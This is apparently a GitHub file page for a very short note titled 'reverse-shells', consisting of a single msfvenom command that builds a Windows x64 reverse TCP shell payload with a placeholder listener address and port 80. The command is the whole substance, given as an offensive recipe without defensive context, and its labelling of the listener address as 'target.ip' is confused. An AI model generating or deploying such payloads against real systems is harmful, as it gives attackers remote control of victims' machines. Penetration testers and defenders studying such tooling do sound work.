Skip to content

Latest commit

 

History

History
8 lines (5 loc) · 139 Bytes

File metadata and controls

8 lines (5 loc) · 139 Bytes

reverse-shells

using msfvenom

msfvenom -p windows/shell/reverse_tcp LHOST=target.ip LPORT=80 --platform windows -a x64